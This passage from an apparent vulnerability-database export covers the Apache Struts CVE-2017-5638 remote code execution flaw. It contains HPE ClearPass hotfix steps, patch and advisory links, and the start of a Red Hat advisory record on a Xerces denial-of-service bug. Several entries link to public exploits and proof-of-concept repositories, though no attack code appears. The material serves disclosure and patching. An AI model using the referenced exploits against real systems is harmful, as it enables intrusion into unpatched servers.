is documented in\n HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE Aruba has provided hotfixes for ClearPass 6.6.5, 6.6.4, and 6.5.7. Use\none of the following methods to install the appropriate hotfix:\n\nInstall the Hotfix Online Using the Software Updates Portal:\n \n 1. Open ClearPass Policy Manager and go to Administration - Agents and\nSoftware\n Updates - Software Updates. \n \n 2. In the Firmware and Patch Updates area, find the \"ClearPass 6.5.7\nHotfix\n Patch for CVE-2017-5638\" or \"ClearPass 6.6.4 Hotfix Patch for\nCVE-2017-5638\"\n patch and click the Download button in its row. \n \n 3. Click Install. \n \n 4. When the installation is complete and the status is shown as \"Needs\n Restart\", proceed to restart ClearPass. After reboot, the status for the\n patch will be shown as Installed. The ClearPass Policy Manager version\n number will not change. \n\n \nInstalling the hotfix Offline Using the Patch File from\nsupport.arubanetworks.com:\n \n 1. Download the \"ClearPass 6.5.7 Hotfix Patch for CVE-2017-5638\" or\n \"ClearPass 6.6.4 Hotfix Patch for CVE-2017-5638\" patch from the Support\nsite. \n \n 2. Open the ClearPass Policy Manager Admin UI and go to Administration -\n Agents and Software Updates - Software Updates. \n 3. At the bottom of the Firmware and Patch Updates area, click Import\nUpdates\n and browse to the downloaded patch file. The name and description once\n imported may differ from the name and remark on the support site\n as these were adjusted after posting. This is purely a cosmetic\ndiscrepancy. \n \n 4. Click Install. \n \n 5. When the installation is complete and the status is shown as Needs\nRestart,\n proceed to restart ClearPass. After reboot, the status for the patch will\n be shown as Installed. The ClearPass Policy Manager version number will\n not change. \n\n\nWorkarounds\n- ----------- \nRestrict access to the Policy Manager Admin Web Interface. This can be\naccomplished by navigating to Administration - Server Manager -\nServer Configuration - Server-Name - Network - Restrict Access and\nonly allowing non-public or network management networks. \n\n**Note:** Please contact HPE Technical Support if any assistance is needed\nacquiring the software updates. \n\nHISTORY\nVersion:1 (rev.1) - 29 March 2017 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n Web form: https://www.hpe.com/info/report-security-vulnerability\n Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQEcBAEBCAAGBQJY3BR/AAoJELXhAxt7SZaiMW8H/0+jWL4Evk+KeqP7aYk1msGp\n9ih3F2680VrHVsUbSzul3+svnaWTJUgRe7fUTvsh/Q6bx/Eo86yo8iXGjmzETLtY\ncTuQrHLySo55Pwua9+89V4e13QkRvQ/UmQPYDMPEk9L7wwU9OF0oCpXHQBuWnw07\nmKLZ12HaZqM8vJXgwgJFH77Mf3r5TkGFHsrZ0M+2vvxioJIEfmWV/x4eqtvIy6zS\nC6CX1M9x4xD442XcFfnH0BHA9RL6LOeYngTPYR7IIycvzpqd8kOWunjs38+IJpFR\ng49ho/NddeZfDKdJcIdfJ+0f3x2h7FPiVadXu1PzdCckhFHkHmrSlVcRbQZ+1R8=\n=8ljI\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-5638"
},
{
"db": "CERT/CC",
"id": "VU#834067"
},
{
"db": "CERT/CC",
"id": "VU#834067"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001621"
},
{
"db": "BID",
"id": "96729"
},
{
"db": "VULMON",
"id": "CVE-2017-5638"
},
{
"db": "PACKETSTORM",
"id": "142055"
},
{
"db": "PACKETSTORM",
"id": "141863"
}
],
"trust": 3.6
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.kb.cert.org/vuls/id/834067",
"trust": 1.6,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=41570",
"trust": 0.2,
"type": "exploit"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#834067"
},
{
"db": "CERT/CC",
"id": "VU#834067"
},
{
"db": "VULMON",
"id": "CVE-2017-5638"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-5638",
"trust": 4.6
},
{
"db": "CERT/CC",
"id": "VU#834067",
"trust": 4.3
},
{
"db": "EXPLOIT-DB",
"id": "41570",
"trust": 3.2
},
{
"db": "BID",
"id": "96729",
"trust": 1.9
},
{
"db": "EXPLOIT-DB",
"id": "41614",
"trust": 1.6
},
{
"db": "SECTRACK",
"id": "1037973",
"trust": 1.6
},
{
"db": "LENOVO",
"id": "LEN-14200",
"trust": 1.6
},
{
"db": "PACKETSTORM",
"id": "141494",
"trust": 1.6
},
{
"db": "JVN",
"id": "JVNVU93610402",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001621",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201703-152",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2017-5638",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "142055",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "141863",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#834067"
},
{
"db": "CERT/CC",
"id": "VU#834067"
},
{
"db": "VULMON",
"id": "CVE-2017-5638"
},
{
"db": "BID",
"id": "96729"
},
{
"db": "PACKETSTORM",
"id": "142055"
},
{
"db": "PACKETSTORM",
"id": "141863"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-152"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001621"
},
{
"db": "NVD",
"id": "CVE-2017-5638"
}
]
},
"id": "VAR-201703-0755",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.5
},
"last_update_date": "2025-11-18T15:18:06.225000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "WW-3025",
"trust": 0.8,
"url": "https://issues.apache.org/jira/browse/WW-3025"
},
{
"title": "Alternate Libraries",
"trust": 0.8,
"url": "https://cwiki.apache.org/confluence/display/WW/File+Upload#FileUpload-AlternateLibraries"
},
{
"title": "S2-045: Possible Remote Code Execution when performing file upload based on Jakarta Multipart parser.",
"trust": 0.8,
"url": "https://struts.apache.org/docs/s2-045.html"
},
{
"title": "Uses default error key if specified key doesn\u0027t exist (3523064)",
"trust": 0.8,
"url": "https://git1-us-west.apache.org/repos/asf?p=struts.git;a=commit;h=352306493971e7d5a756d61780d57a76eb1f519a"
},
{
"title": "Uses default error key if specified key doesn\u0027t exist (6b8272c)",
"trust": 0.8,
"url": "https://git1-us-west.apache.org/repos/asf?p=struts.git;a=commit;h=6b8272ce47160036ed120a48345d9aa884477228"
},
{
"title": "Content-Type: Malicious - New Apache Struts2 0-day Under Attack",
"trust": 0.8,
"url": "http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html"
},
{
"title": "hitachi-sec-2017-110",
"trust": 0.8,
"url": "http://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/hitachi-sec-2017-110/index.html"
},
{
"title": "NV17-013",
"trust": 0.8,
"url": "http://jpn.nec.com/security-info/secinfo/nv17-013.html"
},
{
"title": "hitachi-sec-2017-110",
"trust": 0.8,
"url": "http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/hitachi-sec-2017-110/index.html"
},
{
"title": "Veritas NetBackup: \u4efb\u610f\u306e\u30b3\u30de\u30f3\u30c9\u304c\u5b9f\u884c\u3055\u308c\u308b\u8106\u5f31\u6027(CVE-2017-5638) (2017\u5e749\u67081\u65e5)",
"trust": 0.8,
"url": "http://www.fujitsu.com/jp/products/software/resources/condition/security/products-fujitsu/solution/veritas201712.html"
},
{
"title": "Apache Struts 2 Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=67948"
},
{
"title": "Cisco: Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability Affecting Cisco Products",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20170310-struts2"
},
{
"title": "CVE-2017-5638",
"trust": 0.1,
"url": "https://github.com/readloud/CVE-2017-5638 "
},
{
"title": "cve-2017-5638",
"trust": 0.1,
"url": "https://github.com/jrrdev/cve-2017-5638 "
},
{
"title": "apache-struts-v2-CVE-2017-5638",
"trust": 0.1,
"url": "https://github.com/cafnet/apache-struts-v2-CVE-2017-5638 "
},
{
"title": "struts-vulnerability-demo",
"trust": 0.1,
"url": "https://github.com/corpbob/struts-vulnerability-demo "
},
{
"title": "struts2_cve-2017-5638",
"trust": 0.1,
"url": "https://github.com/m3ssap0/struts2_cve-2017-5638 "
},
{
"title": "struts-rce-cve-2017-5638",
"trust": 0.1,
"url": "https://github.com/riyazwalikar/struts-rce-cve-2017-5638 "
},
{
"title": "equifax-data-breach",
"trust": 0.1,
"url": "https://github.com/raul23/equifax-data-breach "
},
{
"title": "CVE-2017-5638",
"trust": 0.1,
"url": "https://github.com/colorblindpentester/CVE-2017-5638 "
},
{
"title": "struts2-rce",
"trust": 0.1,
"url": "https://github.com/sotudeko/struts2-rce "
},
{
"title": "vuln-struts2-vm",
"trust": 0.1,
"url": "https://github.com/evolvesecurity/vuln-struts2-vm "
},
{
"title": "Apache-Struts-2-CVE-2017-5638-Exploit",
"trust": 0.1,
"url": "https://github.com/dock0d1/Apache-Struts-2-CVE-2017-5638-Exploit "
},
{
"title": "struts2-rce",
"trust": 0.1,
"url": "https://github.com/rjd3/struts2-rce "
},
{
"title": "Struts2-045-RCE",
"trust": 0.1,
"url": "https://github.com/RayScri/Struts2-045-RCE "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2017-5638"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-152"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001621"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-755",
"trust": 1.0
},
{
"problemtype": "CWE-20",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-001621"
},
{
"db": "NVD",
"id": "CVE-2017-5638"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.5,
"url": "https://cwiki.apache.org/confluence/display/ww/s2-045"
},
{
"trust": 3.2,
"url": "http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html"
},
{
"trust": 3.2,
"url": "https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/"
},
{
"trust": 3.2,
"url": "http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2017-5638-apache-struts-vulnerability-remote-code-execution/"
},
{
"trust": 2.7,
"url": "https://www.kb.cert.org/vuls/id/834067"
},
{
"trust": 1.9,
"url": "https://github.com/rapid7/metasploit-framework/issues/8064"
},
{
"trust": 1.6,
"url": "https://github.com/rapid7/metasploit-framework/issues/8064 "
},
{
"trust": 1.6,
"url": "https://www.exploit-db.com/exploits/41570/"
},
{
"trust": 1.6,
"url": "https://cwe.mitre.org/data/definitions/94.html"
},
{
"trust": 1.6,
"url": "http://www.arubanetworks.com/assets/alert/aruba-psa-2017-002.txt"
},
{
"trust": 1.6,
"url": "https://cwiki.apache.org/confluence/display/ww/s2-046"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/96729"
},
{
"trust": 1.6,
"url": "https://arstechnica.com/security/2017/03/critical-vulnerability-under-massive-attack-imperils-high-impact-sites/"
},
{
"trust": 1.6,
"url": "https://www.symantec.com/security-center/network-protection-security-advisories/sa145"
},
{
"trust": 1.6,
"url": "https://exploit-db.com/exploits/41570"
},
{
"trust": 1.6,
"url": "https://packetstormsecurity.com/files/141494/s2-45-poc.py.txt"
},
{
"trust": 1.6,
"url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html"
},
{
"trust": 1.6,
"url": "https://github.com/mazen160/struts-pwn"
},
{
"trust": 1.6,
"url": "https://support.lenovo.com/us/en/product_security/len-14200"
},
{
"trust": 1.6,
"url": "https://struts.apache.org/docs/s2-046.html"
},
{
"trust": 1.6,
"url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbgn03733en_us"
},
{
"trust": 1.6,
"url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03723en_us"
},
{
"trust": 1.6,
"url": "https://security.netapp.com/advisory/ntap-20170310-0001/"
},
{
"trust": 1.6,
"url": "https://twitter.com/theog150/status/841146956135124993"
},
{
"trust": 1.6,
"url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbgn03749en_us"
},
{
"trust": 1.6,
"url": "https://www.exploit-db.com/exploits/41614/"
},
{
"trust": 1.6,
"url": "https://struts.apache.org/docs/s2-045.html"
},
{
"trust": 1.6,
"url": "http://www.eweek.com/security/apache-struts-vulnerability-under-attack.html"
},
{
"trust": 1.6,
"url": "http://www.securitytracker.com/id/1037973"
},
{
"trust": 1.6,
"url": "https://isc.sans.edu/diary/22169"
},
{
"trust": 1.0,
"url": "https://git1-us-west.apache.org/repos/asf?p=struts.git%3ba=commit%3bh=6b8272ce47160036ed120a48345d9aa884477228"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r90890afea72a9571d666820b2fe5942a0a5f86be406fa31da3dd0922%40%3cannounce.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r6d03e45b81eab03580cf7f8bb51cb3e9a1b10a2cc0c6a2d3cc92ed0c%40%3cannounce.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=cve-2017-5638"
},
{
"trust": 1.0,
"url": "https://git1-us-west.apache.org/repos/asf?p=struts.git%3ba=commit%3bh=352306493971e7d5a756d61780d57a76eb1f519a"
},
{
"trust": 1.0,
"url": "https://nmap.org/nsedoc/scripts/http-vuln-cve2017-5638.html"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r1125f3044a0946d1e7e6f125a6170b58d413ebd4a95157e4608041c7%40%3cannounce.apache.org%3e"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-5638"
},
{
"trust": 0.8,
"url": "https://www.ipa.go.jp/security/ciadr/vul/20170308-struts.html"
},
{
"trust": 0.8,
"url": "https://www.jpcert.or.jp/at/2017/at170009.html"
},
{
"trust": 0.8,
"url": "http://jvn.jp/vu/jvnvu93610402/index.html"
},
{
"trust": 0.8,
"url": "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2017-5638"
},
{
"trust": 0.6,
"url": "https://git1-us-west.apache.org/repos/asf?p=struts.git;a=commit;h=6b8272ce47160036ed120a48345d9aa884477228"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/r6d03e45b81eab03580cf7f8bb51cb3e9a1b10a2cc0c6a2d3cc92ed0c@%3cannounce.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/r90890afea72a9571d666820b2fe5942a0a5f86be406fa31da3dd0922@%3cannounce.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/r1125f3044a0946d1e7e6f125a6170b58d413ebd4a95157e4608041c7@%3cannounce.apache.org%3e"
},
{
"trust": 0.6,
"url": "http-vuln-cve2017-5638.html"
},
{
"trust": 0.6,
"url": "https://nmap.org/nsedoc/scripts/"
},
{
"trust": 0.6,
"url": "https://git1-us-west.apache.org/repos/asf?p=struts.git;a=commit;h=352306493971e7d5a756d61780d57a76eb1f519a"
},
{
"trust": 0.6,
"url": "https://www.huawei.com/cn/psirt/security-advisories/huawei-sa-20170316-01-struts2-cn"
},
{
"trust": 0.4,
"url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-hpesbgn03733en_us"
},
{
"trust": 0.3,
"url": "http://www.apache.org/"
},
{
"trust": 0.3,
"url": "http://struts.apache.org/"
},
{
"trust": 0.3,
"url": "https://confluence.atlassian.com/bamboo/bamboo-security-advisory-2017-03-10-876857850.html"
},
{
"trust": 0.3,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1430326"
},
{
"trust": 0.3,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20170310-struts2"
},
{
"trust": 0.3,
"url": "https://confluence.atlassian.com/crowd/crowd-security-advisory-2017-03-10-876857916.html"
},
{
"trust": 0.3,
"url": "https://confluence.atlassian.com/display/hc/hipchat+server+security+advisory+2017-03-09"
},
{
"trust": 0.3,
"url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-hpesbgn03749en_us"
},
{
"trust": 0.3,
"url": "http://www.huawei.com/en/psirt/security-notices/2017/huawei-sn-20170313-01-struts2-en"
},
{
"trust": 0.3,
"url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg22000444"
},
{
"trust": 0.3,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg22001736"
},
{
"trust": 0.3,
"url": "http://www.vmware.com/security/advisories/vmsa-2017-0004.html"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-5638"
},
{
"trust": 0.2,
"url": "http://www.hpe.com/support/security_bulletin_archive"
},
{
"trust": 0.2,
"url": "https://www.hpe.com/info/report-security-vulnerability"
},
{
"trust": 0.2,
"url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499"
},
{
"trust": 0.2,
"url": "http://www.hpe.com/support/subscriber_choice"
},
{
"trust": 0.1,
"url": "https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets"
},
{
"trust": 0.1,
"url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-hpesbhf03723en_us"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#834067"
},
{
"db": "CERT/CC",
"id": "VU#834067"
},
{
"db": "BID",
"id": "96729"
},
{
"db": "PACKETSTORM",
"id": "142055"
},
{
"db": "PACKETSTORM",
"id": "141863"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-152"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001621"
},
{
"db": "NVD",
"id": "CVE-2017-5638"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#834067"
},
{
"db": "CERT/CC",
"id": "VU#834067"
},
{
"db": "VULMON",
"id": "CVE-2017-5638"
},
{
"db": "BID",
"id": "96729"
},
{
"db": "PACKETSTORM",
"id": "142055"
},
{
"db": "PACKETSTORM",
"id": "141863"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-152"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001621"
},
{
"db": "NVD",
"id": "CVE-2017-5638"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-03-14T00:00:00",
"db": "CERT/CC",
"id": "VU#834067"
},
{
"date": "2017-03-14T00:00:00",
"db": "CERT/CC",
"id": "VU#834067"
},
{
"date": "2017-03-11T00:00:00",
"db": "VULMON",
"id": "CVE-2017-5638"
},
{
"date": "2017-03-06T00:00:00",
"db": "BID",
"id": "96729"
},
{
"date": "2017-04-07T18:18:00",
"db": "PACKETSTORM",
"id": "142055"
},
{
"date": "2017-03-30T16:04:25",
"db": "PACKETSTORM",
"id": "141863"
},
{
"date": "2017-03-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201703-152"
},
{
"date": "2017-03-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-001621"
},
{
"date": "2017-03-11T02:59:00.150000",
"db": "NVD",
"id": "CVE-2017-5638"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-03-14T00:00:00",
"db": "CERT/CC",
"id": "VU#834067"
},
{
"date": "2017-03-14T00:00:00",
"db": "CERT/CC",
"id": "VU#834067"
},
{
"date": "2023-11-07T00:00:00",
"db": "VULMON",
"id": "CVE-2017-5638"
},
{
"date": "2017-05-26T07:00:00",
"db": "BID",
"id": "96729"
},
{
"date": "2021-02-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201703-152"
},
{
"date": "2017-10-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-001621"
},
{
"date": "2025-10-22T00:16:06.887000",
"db": "NVD",
"id": "CVE-2017-5638"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201703-152"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Apache Struts 2 is vulnerable to remote code execution",
"sources": [
{
"db": "CERT/CC",
"id": "VU#834067"
},
{
"db": "CERT/CC",
"id": "VU#834067"
}
],
"trust": 1.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "96729"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-152"
}
],
"trust": 0.9
}
}
VAR-202201-1553
Vulnerability from variot - Updated: 2025-05-17 19:52There's a vulnerability within the Apache Xerces Java (XercesJ) XML parser when handling specially crafted XML document payloads. This causes, the XercesJ XML parser to wait in an infinite loop, which may sometimes consume system resources for prolonged duration. This vulnerability is present within XercesJ version 2.12.1 and the previous versions. Xerces is an open source project for XML document parsing promoted by the Apache organization. Description:
Red Hat Process Automation Manager is an open source business process management suite that combines process management and decision service management and enables business and IT users to create, manage, validate, and deploy process applications and decision services.
Security Fix(es):
-
chart.js: prototype pollution (CVE-2020-7746)
-
moment: inefficient parsing algorithm resulting in DoS (CVE-2022-31129)
-
package immer before 9.0.6. After installing the update, restart the server by starting the JBoss Application Server process.
The References section of this erratum contains a download link. You must log in to download the update. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: Red Hat JBoss Enterprise Application Platform 7.4.5 security update on RHEL 7 Advisory ID: RHSA-2022:4918-01 Product: Red Hat JBoss Enterprise Application Platform Advisory URL: https://access.redhat.com/errata/RHSA-2022:4918 Issue date: 2022-06-06 CVE Names: CVE-2020-36518 CVE-2021-37136 CVE-2021-37137 CVE-2021-42392 CVE-2021-43797 CVE-2022-0084 CVE-2022-0853 CVE-2022-0866 CVE-2022-1319 CVE-2022-21299 CVE-2022-21363 CVE-2022-23221 CVE-2022-23437 CVE-2022-23913 CVE-2022-24785 ==================================================================== 1. Summary:
A security update is now available for Red Hat JBoss Enterprise Application Platform 7.4 for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat JBoss EAP 7.4 for RHEL 7 Server - noarch, x86_64
- Description:
Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime.
This release of Red Hat JBoss Enterprise Application Platform 7.4.5 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.4.4 and includes bug fixes and enhancements. See the Red Hat JBoss Enterprise Application Platform 7.4.5 Release Notes for information about the most significant bug fixes and enhancements included in this release.
Security Fix(es):
-
h2: Loading of custom classes from remote servers through JNDI (CVE-2022-23221)
-
jackson-databind: denial of service via a large depth of nested objects (CVE-2020-36518)
-
netty-codec: Bzip2Decoder doesn't allow setting size restrictions for decompressed data (CVE-2021-37136)
-
netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may buffer skippable chunks in an unnecessary way (CVE-2021-37137)
-
h2: Remote Code Execution in Console (CVE-2021-42392)
-
netty: control chars in header names may lead to HTTP request smuggling (CVE-2021-43797)
-
xnio: org.xnio.StreamConnection.notifyReadClosed log to debug instead of stderr (CVE-2022-0084)
-
wildfly: Wildfly management of EJB Session context returns wrong caller principal with Elytron Security enabled (CVE-2022-0866)
-
undertow: Double AJP response for 400 from EAP 7 results in CPING failures (CVE-2022-1319)
-
OpenJDK: Infinite loop related to incorrect handling of newlines in XMLEntityScanner (JAXP, 8270646) (CVE-2022-21299)
-
mysql-connector-java: Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors (CVE-2022-21363)
-
xerces-j2: infinite loop when handling specially crafted XML document payloads (CVE-2022-23437)
-
artemis-commons: Apache ActiveMQ Artemis DoS (CVE-2022-23913)
-
Moment.js: Path traversal in moment.locale (CVE-2022-24785)
-
jboss-client: memory leakage in remote client transaction (CVE-2022-0853)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
- Solution:
Before applying this update, back up your existing Red Hat JBoss Enterprise Application Platform installation and deployed applications.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
2004133 - CVE-2021-37136 netty-codec: Bzip2Decoder doesn't allow setting size restrictions for decompressed data 2004135 - CVE-2021-37137 netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may buffer skippable chunks in an unnecessary way 2031958 - CVE-2021-43797 netty: control chars in header names may lead to HTTP request smuggling 2039403 - CVE-2021-42392 h2: Remote Code Execution in Console 2041472 - CVE-2022-21299 OpenJDK: Infinite loop related to incorrect handling of newlines in XMLEntityScanner (JAXP, 8270646) 2044596 - CVE-2022-23221 h2: Loading of custom classes from remote servers through JNDI 2047200 - CVE-2022-23437 xerces-j2: infinite loop when handling specially crafted XML document payloads 2047343 - CVE-2022-21363 mysql-connector-java: Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors 2060725 - CVE-2022-0853 jboss-client: memory leakage in remote client transaction 2060929 - CVE-2022-0866 wildfly: Wildfly management of EJB Session context returns wrong caller principal with Elytron Security enabled 2063601 - CVE-2022-23913 artemis-commons: Apache ActiveMQ Artemis DoS 2064226 - CVE-2022-0084 xnio: org.xnio.StreamConnection.notifyReadClosed log to debug instead of stderr 2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects 2072009 - CVE-2022-24785 Moment.js: Path traversal in moment.locale 2073890 - CVE-2022-1319 undertow: Double AJP response for 400 from EAP 7 results in CPING failures
- JIRA issues fixed (https://issues.jboss.org/):
